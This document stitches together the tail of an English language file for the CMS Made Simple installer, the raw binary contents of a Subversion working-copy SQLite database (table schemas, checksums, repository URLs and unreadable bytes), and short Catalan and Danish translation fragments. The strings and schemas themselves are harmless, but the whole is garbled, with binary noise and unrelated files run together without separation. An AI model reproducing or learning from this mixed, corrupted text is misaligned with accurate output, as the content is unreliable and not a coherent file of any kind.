$lang['step2_errortoonew'] = 'The selected directory appears to contain a CMSMS installation with a newer version than what is included in this script. Unable to proceed';
$lang['step2_info_freshen'] = 'Freshening the installation involves replacing all core files and recreating the configuration. You will be asked basic configuration information, however the database will not be touched.';
$lang['step2_installdate'] = 'Approximate installation date';
$lang['step2_install_dirnotempty2'] = 'This folder already contains some files and/or subfolders.  Though it is possible to install CMSMS here, it may inadvertently corrupt an existing application.  Please double check the contents of this folder.  For reference purposes some of the files are listed below.  Please ensure that this is correct.';
$lang['step2_hdr_upgradeinfo'] = 'Version information';
$lang['step2_info_upgradeinfo'] = 'Below are the available release notes and changelog information for each release. The buttons below will display detailed information as to what has changed in each version of CMS Made Simple. There may be further instructions or warnings in each version that could affect the upgrade process.';
$lang['step2_minupgradever'] = 'The minimum version that this application can upgrade from is: %s. You may need to upgrade your application to a newer version in stages, using another method before completing the upgrade process. Please ensure that you have a complete, verified backup before using any upgrade method.';
$lang['step2_nocmsms'] = 'We did not find an installation of CMS Made Simple in this directory. It looks like this is a new installation';
$lang['step2_nofiles'] = 'As requested, CMSMS Core files will not be processed during this process';
$lang['step2_passed'] = 'Passed';
$lang['step2_pwd'] = 'Your current working directory';
$lang['step2_schemaver'] = 'Database Schema version';
$lang['step2_version'] = 'Your version';
$lang['step3_failed'] = 'This package has performed numerous tests of your PHP environment, and one or more of those tests have failed. You will need to rectify these errors in your configuration before continuing. Once you have rectified the errors, click &quot;Retry&quot; below.';
$lang['step3_passed'] = 'This package has performed numerous tests of your PHP environment, and they have all passed. This is great news! Although this is not an all-encompassing test, you should have no difficulty running the core installation of CMSMS.';
$lang['step9_get_help'] = 'Connect with other CMSMS developers and get help in the following ways';
$lang['step9_get_support'] = 'Support channels';
$lang['step9_join_community'] = 'Join our community';
$lang['step9_love_cmsms'] = 'Love CMS Made Simple';
$lang['step9_removethis'] = '<strong>Warning</strong> For security reasons it is important that you remove the installation assistant from your browseable website as soon as you have verified that the operation has succeeded.';
$lang['step9_support_us'] = 'Click here to find out how you can support us';
$lang['symbol'] = 'Symbol';
$lang['social_message'] = 'I have successfully installed CMS Made Simple!';

# T
$lang['test_failed'] = 'A required test failed';
$lang['test_passed'] = 'A test passed <em>(passed tests are only displayed in advanced mode)</em>';
$lang['test_warning'] = 'A setting is above the required value, but below the recommended value, or...<br />A capability that may be required for some optional functionality is unavailable';
$lang['th_status'] = 'Status';
$lang['th_testname'] = 'Test';
$lang['th_value'] = 'Value';
$lang['title_error'] = 'Houston, We have a problem!';
$lang['title_step2'] = 'Step 2 - Detect existing software';
$lang['title_step3'] = 'Step 3 - Tests';
$lang['title_step4'] = 'Step 4 - Basic Configuration Information';
$lang['title_step5'] = 'Step 5 - Admin Account Information';
$lang['title_step6'] = 'Step 6 - Site Settings';
$lang['title_step7'] = 'Step 7 - Install Application Files';
$lang['title_step8'] = 'Step 8 - Database Work';
$lang['title_step9'] = 'Step 9 - Finish';
$lang['title_welcome'] = 'Welcome';
$lang['title_forum'] = 'Support Forum';
$lang['title_docs'] = 'Official Documentation';
$lang['title_api_docs'] = 'Official API Documentation';
$lang['to'] = 'to';
$lang['title_share'] = 'Share your experience with your friends.';
$lang['tmpfile'] = 'Checking for working tmpfile()';
$lang['tmp_dirs_empty'] = 'Ensure that temporary directories are empty or do not exist';

# U
$lang['upgrade'] = 'Upgrade';
$lang['upgrade_deleteoldevents'] = 'Deleting old events';
$lang['upgrading_schema'] = 'Updating database schema';
$lang['upload_max_filesize'] = 'Checking maximum size of uploaded files';
$lang['username'] = 'Username';

# V

# W
$lang['warn_disable_functions'] = 'Note: one or more PHP core functions are disabled. This can have a negative impact on your CMSMS installation, particularly with third party extensions. Please keep an eye on your error log. Your disabled functions are: <br /><br />%s';
$lang['warn_max_execution_time'] = 'Although your max execution time of %s meets or exceeds the minimum value of %s, we recommend you increase it to %s or greater';
$lang['warn_memory_limit'] = 'Your memory limit value is %s, which is above the minimum of %s. However, %s is recommended';
$lang['warn_open_basedir'] = 'open_basedir is enabled in your php configuration.  Although you may continue, CMSMS will not support installs with open_basedir restrictions.';
$lang['warn_post_max_size'] = 'Your post max size value is %s, which is above the minimum of %s, however %s is recommended. Also, please ensure that this value is larger than the upload_max_filesize';
$lang['warn_tests'] = '<strong>Note:</strong> passing all of these tests should ensure that CMSMS functions properly for most sites. However, as the site grows and more functionality is added, these minimal values may become insufficient. Additionally, third party modules may have further requirements to function properly';
$lang['warn_upload_max_filesize'] = 'Although your setting of %s is sufficient, we recommend you increase the upload_max_filesize setting in PHP to at least %s';
$lang['welcome_message'] = 'Welcome! This is the CMS Made Simple Automatic Installation Mechanism. This package will allow you to quickly and easily confirm that your web host is compatible with CMSMS and to install or upgrade to the latest version of CMS Made Simple.<br />We know that you will enjoy it.';
$lang['wizard_step1'] = 'Welcome';
$lang['wizard_step2'] = 'Detect Existing Software';
$lang['wizard_step3'] = 'Compatibility Tests';
$lang['wizard_step4'] = 'Configuration Info';
$lang['wizard_step5'] = 'Admin Account Info';
$lang['wizard_step6'] = 'Site Settings';
$lang['wizard_step7'] = 'Files';
$lang['wizard_step8'] = 'Database work';
$lang['wizard_step9'] = 'Finish';

# X
$lang['xml_functions'] = 'Checking for XML functionality';

# Y
$lang['yes'] = 'Yes';

# Z

?>
12
12
SQLite format 3@  00.j����H
�
@?
�	o��������@����''�QviewNODES_CURRENTNODES_CURRENTCREATE VIEW NODES_CURRENT AS   SELECT * FROM nodes AS n     WHERE op_depth = (SELECT MAX(op_depth) FROM nodes AS n2                       WHERE n2.wc_id = n.wc_id                         AND n2.local_relpath = n.local_relpath)e'�indexI_NODES_MOVEDNODESCREATE UNIQUE INDEX I_NODES_MOVED ON NODES (wc_id, moved_to, op_depth)�))�indexI_NODES_PARENTNODESCREATE UNIQUE INDEX I_NODES_PARENT ON NODES (wc_id, parent_relpath,                                              local_relpath, op_depth)�U�	tableNODESNODESCREATE TABLE NODES (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   op_depth INTEGER NOT NULL,   parent_relpath  TEXT,   repos_id  INTEGER REFERENCES REPOSITORY (id),   repos_path  TEXT,   revision  INTEGER,   presence  TEXT NOT NULL,   moved_here  INTEGER,   moved_to  TEXT,   kind  TEXT NOT NULL,   properties  BLOB,   depth  TEXT,   checksum  TEXT REFERENCES PRISTINE (checksum),   symlink_target  TEXT,   changed_revision  INTEGER,   changed_date      INTEGER,   changed_author    TEXT,   translated_size  INTEGER,   last_mod_time  INTEGER,   dav_cache  BLOB,   file_external  INTEGER,   inherited_props  BLOB,   PRIMARY KEY (wc_id, local_relpath, op_depth)   ))=indexsqlite_autoindex_NODES_1NODES�b�tableWC_LOCKWC_LOCKCREATE TABLE WC_LOCK (   wc_id  INTEGER NOT NULL  REFERENCES WCROOT (id),   local_dir_relpath  TEXT NOT NULL,   locked_levels  INTEGER NOT NULL DEFAULT -1,   PRIMARY KEY (wc_id, local_dir_relpath)  )-Aindexsqlite_autoindex_WC_LOCK_1WC_LOCK}!!�EtableWORK_QUEUEWORK_QUEUECREATE TABLE WORK_QUEUE (   id  INTEGER PRIMARY KEY AUTOINCREMENT,   work  BLOB NOT NULL   )�
�wtableLOCKLOCKCREATE TABLE LOCK (   repos_id  INTEGER NOT NULL REFERENCES REPOSITORY (id),   repos_relpath  TEXT NOT NULL,   lock_token  TEXT NOT NULL,   lock_owner  TEXT,   lock_comment  TEXT,   lock_date  INTEGER,   PRIMARY KEY (repos_id, repos_relpath)   )';indexsqlite_autoindex_LOCK_1LOCK�4+#�'indexI_ACTUAL_PARENTACTUAL_NODECREATE UNIQUE INDEX I_ACTUAL_PARENT ON ACTUAL_NODE (wc_id, parent_relpath,                                                     local_relpath)�<##�?tableACTUAL_NODEACTUAL_NODE
CREATE TABLE ACTUAL_NODE (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   parent_relpath  TEXT,   properties  BLOB,   conflict_old  TEXT,   conflict_new  TEXT,   conflict_working  TEXT,   prop_reject  TEXT,   changelist  TEXT,   text_mod  TEXT,   tree_conflict_data  TEXT,   conflict_data  BLOB,   older_checksum  TEXT REFERENCES PRISTINE (checksum),   left_checksum  TEXT REFERENCES PRISTINE (checksum),   right_checksum  TEXT REFERENCES PRISTINE (checksum),   PRIMARY KEY (wc_id, local_relpath)   )5
I#indexsqlite_autoindex_ACTUAL_NODE_1ACTUAL_NODEX)yindexI_PRISTINE_MD5PRISTINECREATE INDEX I_PRISTINE_MD5 ON PRISTINE (md5_checksum)�M	�mtablePRISTINEPRISTINE
CREATE TABLE PRISTINE (   checksum  TEXT NOT NULL PRIMARY KEY,   compression  INTEGER,   size  INTEGER NOT NULL,   refcount  INTEGER NOT NULL,   md5_checksum  TEXT NOT NULL   )/
Cindexsqlite_autoindex_PRISTINE_1PRISTINE_+�indexI_LOCAL_ABSPATHWCROOT	CREATE UNIQUE INDEX I_LOCAL_ABSPATH ON WCROOT (local_abspath)x�KtableWCROOTWCROOTCREATE TABLE WCROOT (   id  INTEGER PRIMARY KEY AUTOINCREMENT,   local_abspath  TEXT UNIQUE   )+?indexsqlite_autoindex_WCROOT_1WCROOTD!]indexI_ROOTREPOSITORYCREATE INDEX I_ROOT ON REPOSITORY (root)D!]indexI_UUIDREPOSITORYCREATE INDEX I_UUID ON REPOSITORY (uuid)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�!!�tableREPOSITORYREPOSITORYCREATE TABLE REPOSITORY (   id INTEGER PRIMARY KEY AUTOINCREMENT,   root  TEXT UNIQUE NOT NULL,   uuid  TEXT NOT NULL   )3G!indexsqlite_autoindex_REPOSITORY_1REPOSITORY
��XmUhttp://svn.cmsmadesimple.org/svn/translatecenterffbaec8b-0406-0410-bd6f-d8cd2f59f08d
��3m	http://svn.cmsmadesimple.org/svn/translatecenter
����!WORK_QUEUE
		WCROOT
!	REPOSITORY
��'U	ffbaec8b-0406-0410-bd6f-d8cd2f59f08d
��3m	http://svn.cmsmadesimple.org/svn/translatecenter
��
��	
��	

4�D��(
�
l

�P��4]
i	Y$sha1$9b2b574de894fa79f34e6c3360c3d5883bdaa036��$md5 $2171893565d659adfc771c47933936d9]i	Y$sha1$452579cb34b89e5ff99f063aa235d91503c761e1�F$md5 $9ac71c7065f613774e783af12e0a5d97\i	Y$sha1$917fe7efbbc9b437dedb7c8d8441afaa95cd4878~�$md5 $c709e8eaf965708c8ca3f4bb5f6aff10]
i	Y$sha1$0ed15864535f3e96695d4dc733fa656ff2c43c8a�P$md5 $a2e2046bed1a6bc27c8c42860d65e46e\	i	Y$sha1$61a52da0736de969cfb0b08a37d125d05adcc5d0jq$md5 $3b6bf70a3ce396587ee86a80f7d3ea85]i	Y$sha1$ecc1227d43ac759d7a6dd6ef9e062012972d3384�F$md5 $7b3611e2f29004cd7c0ba560ff036584\i	Y$sha1$0358b59d9dfb528bb88372ee5a718edbf9ea6e85(�$md5 $f8a52e773dceda649d3e986b8931e131\i	Y$sha1$bb02def8058a0a1760e2742d965bd107f815b556�$md5 $9ace92ba25a9e38ca8e6551047e37530]iY$sha1$48b537b95f22edeef9e2a1c1c2511a9e470a159b��$md5 $4e638c327bf688c7956f92f60342da2f]i	Y$sha1$9d59440f77fb0d01e65647c5afe6d20d351fe468��$md5 $3eca85fae5db43ab9e3c870718935a9c\i	Y$sha1$460cd0290e2dd2d49df60e9784ffd227f05f1622{�$md5 $49330428dce1d872094ab43f6ecbbca3\i	Y$sha1$2ad3871308764a429d9c31413a238dac20fb6eefC�$md5 $c8597239c374c0ace280f4b1134bd1d7\i	Y$sha1$3c489ef91f90807823975bd3d737e0d334453dcf$md5 $3322024c5d5cf7214593754f34e9d1e8


j���
�h6
�
j5�i2i$sha1$9b2b574de894fa79f34e6c3360c3d5883bdaa036
2i$sha1$452579cb34b89e5ff99f063aa235d91503c761e12i$sha1$917fe7efbbc9b437dedb7c8d8441afaa95cd48782i$sha1$0ed15864535f3e96695d4dc733fa656ff2c43c8a
2i$sha1$61a52da0736de969cfb0b08a37d125d05adcc5d0	2i$sha1$ecc1227d43ac759d7a6dd6ef9e062012972d33842i$sha1$0358b59d9dfb528bb88372ee5a718edbf9ea6e852i$sha1$bb02def8058a0a1760e2742d965bd107f815b5562i$sha1$48b537b95f22edeef9e2a1c1c2511a9e470a159b2i$sha1$9d59440f77fb0d01e65647c5afe6d20d351fe4682i$sha1$460cd0290e2dd2d49df60e9784ffd227f05f16222i$sha1$2ad3871308764a429d9c31413a238dac20fb6eef1i	$sha1$3c489ef91f90807823975bd3d737e0d334453dcf


�
��~U�*�
��S(��*Y$md5 $2171893565d659adfc771c47933936d9
*Y$md5 $9ac71c7065f613774e783af12e0a5d97*Y$md5 $c709e8eaf965708c8ca3f4bb5f6aff10*Y$md5 $a2e2046bed1a6bc27c8c42860d65e46e
*Y$md5 $3b6bf70a3ce396587ee86a80f7d3ea85	*Y$md5 $7b3611e2f29004cd7c0ba560ff036584*Y$md5 $f8a52e773dceda649d3e986b8931e131*Y$md5 $9ace92ba25a9e38ca8e6551047e37530*Y$md5 $4e638c327bf688c7956f92f60342da2f*Y$md5 $3eca85fae5db43ab9e3c870718935a9c*Y$md5 $49330428dce1d872094ab43f6ecbbca3*Y$md5 $c8597239c374c0ace280f4b1134bd1d7)Y	$md5 $3322024c5d5cf7214593754f34e9d1e8





�DDDDDDDDDDD�L(file-install it_IT.php 1 0 1 1)�L(file-install pt_PT.php 1 0 1 1)rL(file-install uk_UA.php 1 0 1 1)ML(file-install nl_NL.php 1 0 1 1)(L(file-install da_DK.php 1 0 1 1)L(file-install de_DE.php 1 0 1 1)�L(file-install sv_SE.php 1 0 1 1)�L(file-install fr_FR.php 1 0 1 1)�L(file-install ru_RU.php 1 0 1 1)oL(file-install nb_NO.php 1 0 1 1)JL(file-install sk_SK.php 1 0 1 1)#
L(file-install fr_FR.php 1 0 1 1)
�	
�
�	
	
�
��
���	�r�^I5 
���		
	_i!�dda_DK.phpmodules/cmspharinstall/lang/ext/da_DK.php_�normalfile()$sha1$ecc1227d43ac759d7a6dd6ef9e062012972d3384[ouDB�translator�F#����(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/23407/modules/cmspharinstall/lang/ext/da_DK.php)�
	K!modules/cmspharinstall/lang/ext_�normaldir()infinity_�
��translator()�	
	_i!�dit_IT.phpmodules/cmspharinstall/lang/ext/it_IT.php_�normalfile()$sha1$452579cb34b89e5ff99f063aa235d9f	b	
	K!modules/cmspharinstall/lang/ext_�normaldir()infinity_��{�translator()�
	
	_i!�dit_IT.phpmodules/cmspharinstall/lang/ext/it_IT.php_�normalfile()$sha1$452579cb34b89e5ff99f063aa235d91503c761e1]��$�KXtranslator�F#����(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24057/modules/cmspharinstall/lang/ext/it_IT.php)�	
	_i!�dpt_PT.phpmodules/cmspharinstall/lang/ext/pt_PT.php_�normalfile()$sha1$917fe7efbbc9b437dedb7c8d8441afaa95cd4878Y&Iw0�ptranslator~�#����(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/22822/modules/cmspharinstall/lang/ext/pt_PT.php)�	
	_i!�duk_UA.phpmodules/cmspharinstall/lang/ext/uk_UA.php_�normalfile()$sha1$0ed15864535f3e96695d4dc733fa656ff2c43c8a\�z�|Ztranslator�P#��N>(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/23713/modules/cmspharinstall/lang/ext/uk_UA.php)�
	
	_i!�dnl_NL.phpmodules/cmspharinstall/lang/ext/nl_NL.php_�normalfile()$sha1$61a52da0736de969cfb0b08a37d125d05adcc5d0_�
��translatorjq#���(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24485/modules/cmspharinstall/lang/ext/nl_NL.php)�	
	_i!�dde_DE.phpmodules/cmspharinstall/lang/ext/de_DE.php_�normalfile()$sha1$0358b59d9dfb528bb88372ee5a718edbf9ea6e85_׽�	translator(�#���<(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24347/modules/cmspharinstall/lang/ext/de_DE.php)�	
	_i!�dsv_SE.phpmodules/cmspharinstall/lang/ext/sv_SE.php_�normalfile()$sha1$bb02def8058a0a1760e2742d965bd107f815b556VP�U�rtranslator�#��o�(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/22096/modules/cmspharinstall/lang/ext/sv_SE.php)�	
	_i!�dfr_FR.phpmodules/cmspharinstall/lang/ext/fr_FR.php_�normalfile()$sha1$9b2b574de894fa79f34e6c3360c3d5883bdaa036_��{�translator���>�TD(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24515/modules/cmspharinstall/lang/ext/fr_FR.php)�	
	_i!�dru_RU.phpmodules/cmspharinstall/lang/ext/ru_RU.php_�normalfile()$sha1$9d59440f77fb0d01e65647c5afe6d20d351fe468_4ڋ��translator��#��#(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24372/modules/cmspharinstall/lang/ext/ru_RU.php)�	
	_i!�dnb_NO.phpmodules/cmspharinstall/lang/ext/nb_NO.php_�normalfile()$sha1$460cd0290e2dd2d49df60e9784ffd227f05f1622_�%�6Đtranslator{�#���q(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24465/modules/cmspharinstall/lang/ext/nb_NO.php)�	
	_i!�dsk_SK.phpmodules/cmspharinstall/lang/ext/sk_SK.php_�normalfile()$sha1$2ad3871308764a429d9c31413a238dac20fb6eefW�+�
�translatorC�#����(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/22485/modules/cmspharinstall/lang/ext/sk_SK.php)�	
	_i!�dca_ES.phpmodules/cmspharinstall/lang/ext/ca_ES.php_�normalfile()$sha1$3c489ef91f90807823975bd3d737e0d334453dcf^��ȫzA�translator#��^	(svn:wc:ra_dav:version-url 77 /svn/translatecenter/!svn/ver/24226/modules/cmspharinstall/lang/ext/ca_ES.php)
�
33�z��:�jJ���Z	
	it_IT.php
	pt_PT.php	uk_UA.php	nl_NL.php
	da_DK.php		de_DE.php	sv_SE.php	fr_FR.php	ru_RU.php	nb_NO.php	sk_SK.php	ca_ES.php	
�
%%�q��-�`>���O	
	
it_IT.php
	
pt_PT.php	
uk_UA.php	
nl_NL.php
	
da_DK.php		
de_DE.php	
sv_SE.php	
fr_FR.php	
ru_RU.php	
nb_NO.php	
sk_SK.php	
ca_ES.php
	
�
��������������		
			
										
��&���H
�
@?
�	o��������@��j�!!�viewNODES_BASENODES_BASECREATE VIEW NODES_BASE AS   SELECT * FROM nodes   WHERE op_depth = 0�''�QviewNODES_CURRENTNODES_CURRENTCREATE VIEW NODES_CURRENT AS   SELECT * FROM nodes AS n     WHERE op_depth = (SELECT MAX(op_depth) FROM nodes AS n2                       WHERE n2.wc_id = n.wc_id                         AND n2.local_relpath = n.local_relpath)e'�indexI_NODES_MOVEDNODESCREATE UNIQUE INDEX I_NODES_MOVED ON NODES (wc_id, moved_to, op_depth)�))�indexI_NODES_PARENTNODESCREATE UNIQUE INDEX I_NODES_PARENT ON NODES (wc_id, parent_relpath,                                              local_relpath, op_depth)���	tableNODESNODESCREATE TABLE NODES (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   op_depth INTEGER NOT NULL,   parent_relpath  TEXT,   repos_id  INTEGER REFERENCES REPOSITORY (id),   repos_path  TEXT,   revision  INTEGER,   presence  TEXT NOT NULL,   moved_here  INTEGER,   moved_to  TEXT,   kind  TEXT NOT NULL,   properties  BLOB,   depth  TEXT,   checksum  TEXT REFERENCES PRISTINE (checksum),   symlink_target  TEXT,   changed_revision  INTEGER,   changed_date      INTEGER,   changed_author    TEXT,   translated_size  INTEGER,   last_mod_time  INTEGER,   dav_cache  BLOB,   file_external  INTEGER,   inherited_props  BLOB,   PRIMARY KEY (wc_id, local_relpath, op_depth)   ))=indexsqlite_autoindex_NODES_1NODES���tableWC_LOCKWC_LOCKCREATE TABLE WC_LOCK (   wc_id  INTEGER NOT NULL  REFERENCES WCROOT (id),   local_dir_relpath  TEXT NOT NULL,   locked_levels  INTEGER NOT NULL DEFAULT -1,   PRIMARY KEY (wc_id, local_dir_relpath)  )-Aindexsqlite_autoindex_WC_LOCK_1WC_LOCK�!!�EtableWORK_QUEUEWORK_QUEUECREATE TABLE WORK_QUEUE (   id  INTEGER PRIMARY KEY AUTOINCREMENT,   work  BLOB NOT NULL   )�
�wtableLOCKLOCKCREATE TABLE LOCK (   repos_id  INTEGER NOT NULL REFERENCES REPOSITORY (id),   repos_relpath  TEXT NOT NULL,   lock_token  TEXT NOT NULL,   lock_owner  TEXT,   lock_comment  TEXT,   lock_date  INTEGER,   PRIMARY KEY (repos_id, repos_relpath)   )�);indexsqlite_autoindex_LOCK_1LOCK�4+#�'indexI_ACTUAL_PARENTACTUAL_NODECREATE UNIQUE INDEX I_ACTUAL_PARENT ON ACTUAL_NODE (wc_id, parent_relpath,                                                     local_relpath)�<##�?tableACTUAL_NODEACTUAL_NODE
CREATE TABLE ACTUAL_NODE (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   parent_relpath  TEXT,   properties  BLOB,   conflict_old  TEXT,   conflict_new  TEXT,   conflict_working  TEXT,   prop_reject  TEXT,   changelist  TEXT,   text_mod  TEXT,   tree_conflict_data  TEXT,   conflict_data  BLOB,   older_checksum  TEXT REFERENCES PRISTINE (checksum),   left_checksum  TEXT REFERENCES PRISTINE (checksum),   right_checksum  TEXT REFERENCES PRISTINE (checksum),   PRIMARY KEY (wc_id, local_relpath)   )5
I#indexsqlite_autoindex_ACTUAL_NODE_1ACTUAL_NODEX)yindexI_PRISTINE_MD5PRISTINECREATE INDEX I_PRISTINE_MD5 ON PRISTINE (md5_checksum)�M	�mtablePRISTINEPRISTINE
CREATE TABLE PRISTINE (   checksum  TEXT NOT NULL PRIMARY KEY,   compression  INTEGER,   size  INTEGER NOT NULL,   refcount  INTEGER NOT NULL,   md5_checksum  TEXT NOT NULL   )/
Cindexsqlite_autoindex_PRISTINE_1PRISTINE_+�indexI_LOCAL_ABSPATHWCROOT	CREATE UNIQUE INDEX I_LOCAL_ABSPATH ON WCROOT (local_abspath)x�KtableWCROOTWCROOTCREATE TABLE WCROOT (   id  INTEGER PRIMARY KEY AUTOINCREMENT,   local_abspath  TEXT UNIQUE   )+?indexsqlite_autoindex_WCROOT_1WCROOTD!]indexI_ROOTREPOSITORYCREATE INDEX I_ROOT ON REPOSITORY (root)D!]indexI_UUIDREPOSITORYCREATE INDEX I_UUID ON REPOSITORY (uuid)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�!!�tableREPOSITORYREPOSITORYCREATE TABLE REPOSITORY (   id INTEGER PRIMARY KEY AUTOINCREMENT,   root  TEXT UNIQUE NOT NULL,   uuid  TEXT NOT NULL   )3G!indexsqlite_autoindex_REPOSITORY_1REPOSITORY
�e�XsDlA
�
.	$������eK %%[tablesqlite_stat1sqlite_stat1CREATE TABLE sqlite_stat1(tbl,idx,stat)�s3�!indexI_EXTERNALS_DEFINEDEXTERNALSCREATE UNIQUE INDEX I_EXTERNALS_DEFINED ON EXTERNALS (wc_id,                                                       def_local_relpath,                                                       local_relpath)�V�{tableEXTERNALSEXTERNALSCREATE TABLE EXTERNALS (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   parent_relpath  TEXT NOT NULL,   repos_id  INTEGER NOT NULL REFERENCES REPOSITORY (id),   presence  TEXT NOT NULL,   kind  TEXT NOT NULL,   def_local_relpath         TEXT NOT NULL,   def_repos_relpath         TEXT NOT NULL,   def_operational_revision  TEXT,   def_revision              TEXT,   PRIMARY KEY (wc_id, local_relpath) )1Eindexsqlite_autoindex_EXTERNALS_1EXTERNALS�LG�Etriggernodes_update_checksum_triggernodesCREATE TRIGGER nodes_update_checksum_trigger AFTER UPDATE OF checksum ON nodes WHEN NEW.checksum IS NOT OLD.checksum BEGIN   UPDATE pristine SET refcount = refcount + 1   WHERE checksum = NEW.checksum;   UPDATE pristine SET refcount = refcount - 1   WHERE checksum = OLD.checksum; END�W5�mtriggernodes_delete_triggernodesCREATE TRIGGER nodes_delete_trigger AFTER DELETE ON nodes WHEN OLD.checksum IS NOT NULL BEGIN   UPDATE pristine SET refcount = refcount - 1   WHERE checksum = OLD.checksum; END�W5�mtriggernodes_insert_triggernodesCREATE TRIGGER nodes_insert_trigger AFTER INSERT ON nodes WHEN NEW.checksum IS NOT NULL BEGIN   UPDATE pristine SET refcount = refcount + 1   WHERE checksum = NEW.checksum; ENDc!!�viewNODES_BASENODES_BASECREATE VIEW NODES_BASE AS   SELECT * FROM nodes   WHERE op_depth = 0�''�QviewNODES_CURRENTNODES_CURRENTCREATE VIEW NODES_CURRENT AS   SELECT * FROM nodes AS n     WHERE op_depth = (SELECT MAX(op_depth) FROM nodes AS n2                       WHERE n2.wc_id = n.wc_id                         AND n2.local_relpath = n.local_relpath)e'�indexI_NODES_MOVEDNODESCREATE UNIQUE INDEX I_NODES_MOVED ON NODES (wc_id, moved_to, op_depth)�))�indexI_NODES_PARENTNODESCREATE UNIQUE INDEX I_NODES_PARENT ON NODES (wc_id, parent_relpath,                                              local_relpath, op_depth))=indexsqlite_autoindex_NODES_1NODES�U�	tableNODESNODESCREATE TABLE NODES (   wc_id  INTEGER NOT NULL REFERENCES WCROOT (id),   local_relpath  TEXT NOT NULL,   op_depth INTEGER NOT NULL,   parent_relpath  TEXT,   repos_id  INTEGER REFERENCES REPOSITORY (id),   repos_path  TEXT,   revision  INTEGER,   presence  TEXT NOT NULL,   moved_here  INTEGER,   moved_to  TEXT,   kind  TEXT NOT NULL,   properties  BLOB,   depth  TEXT,   checksum  TEXT REFERENCES PRISTINE (checksum),   symlink_target  TEXT,   changed_revision  INTEGER,   changed_date      INTEGER,   changed_author    TEXT,   translated_size  INTEGER,   last_mod_time  INTEGER,   dav_cache  BLOB,   file_external  INTEGER,   inherited_props  BLOB,   PRIMARY KEY (wc_id, local_relpath, op_depth)   )-Aindexsqlite_autoindex_WC_LOCK_1WC_LOCK�b�tableWC_LOCKWC_LOCKCREATE TABLE WC_LOCK (   wc_id  INTEGER NOT NULL  REFERENCES WCROOT (id),   local_dir_relpath  TEXT NOT NULL,   locked_levels  INTEGER NOT NULL DEFAULT -1,   PRIMARY KEY (wc_id, local_dir_relpath)  )}!!�EtableWORK_QUEUEWORK_QUEUECREATE TABLE WORK_QUEUE (   id  INTEGER PRIMARY KEY AUTOINCREMENT,   work  BLOB NOT NULL   )';indexsqlite_autoindex_LOCK_1LOCK



	_���H���_+	3#EXTERNALSI_EXTERNALS_DEFINED100 100 3 12EEXTERNALSsqlite_autoindex_EXTERNALS_1100 100 1.AWC_LOCKsqlite_autoindex_WC_LOCK_1100 100 1(;LOCKsqlite_autoindex_LOCK_1100 100 1,#+)ACTUAL_NODEI_ACTUAL_PARENT8000 8000 10 18#I#ACTUAL_NODEsqlite_autoindex_ACTUAL_NODE_18000 8000 1#''NODESI_NODES_MOVED8000 8000 1 1')-NODESI_NODES_PARENT8000 8000 10 2 1.='NODESsqlite_autoindex_NODES_18000 8000 2 1<?php
$lang['action_freshen'] = 'Refrescant / Reparant %s instal.lació  de CMS';
$lang['action_install'] = 'Creant un nou web %s CMSMS';
$lang['action_upgrade'] = 'Actualitzant un Web CMSMS a versió %s';
$lang['advanced_mode'] = 'Habilita el mode avançat';
?><?php
$lang['action_freshen'] = 'Genopfriskning eller reparation af en CMSMS %s installation';
$lang['action_install'] = 'Opretter en ny CMSMS-baseret hjemmeside';
$lang['action_upgrade'] = 'Opgraderer en CMSMS-hjemmeside til version %s';
$lang['advanced_mode'] = 'Anvend avanceret metode';
$lang['apptitle'] = 'Hjælper til installation og opgradering';
$lang['assets_dir_exists'] = 'Mappe til aktiver eksisterer';
$lang['available_languages'] = 'Tilgængelige sprog';
$lang['build_date'] = 'Kompileringsdato';
$lang['changelog_uc'] = 'Ændringslog';
$lang['cleaning_files'] = 'Fjerner filer, som ikke længere skal bruges af denne udgivelse';
$lang['config_writable'] = 'Tester om der kan skrives til konfiguationsfilen';
$lang['confirm_freshen'] = 'Er du sikker på, du vil opfriske (reparere) den eksisterende CMSMS-installation? Vær meget forsigtig!';
$lang['confirm_upgrade'] = 'Er du sikker på, du vil påbegynde opgraderingsprocessen?';
$lang['curl_extension'] = 'Tester Curl-udvidelse';
$lang['create_assets_structure'] = 'Opretter lokation til filressourcer';
$lang['database_support'] = 'Tjekker at der findes kompatible databasedrivere';
$lang['desc_wizard_step1'] = 'Begynd installations -eller opgraderingsproces';
$lang['desc_wizard_step2'] = 'Analyserer destinationsmappe mht. eksisterende software';
$lang['desc_wizard_step3'] = 'Tester og sikrer at alt er i orden således at CMSMS\' kerne kan installeres';
$lang['desc_wizard_step4'] = 'Indtast grundliggende konfiguraitons-info mhp. nye installationer og genopfriskende operationer';
$lang['desc_wizard_step5'] = 'Er der tale om en ny installation, så indtast info vedrørende administratorens konto';
$lang['desc_wizard_step6'] = 'Er der tale om en ny installation, så indtast nogle grundliggende detaljer om hjemmesiden';
$lang['desc_wizard_step7'] = 'Udpak filer';
$lang['desc_wizard_step8'] = 'Opret eller opdatér database-skema, sæt indledende handlinger, tilladelser, brugerkonti, skabeloner, typografiark og indhold';
$lang['desc_wizard_step9'] = 'Installér og/eller opgradér moduler, hvor det er nødvendigt, skriv konfigurationsfilen og ryd op.';
$lang['destination_directory'] = 'Destinationsmappe';
$lang['dest_writable'] = 'Opret tilladelser for destinationsmappen';
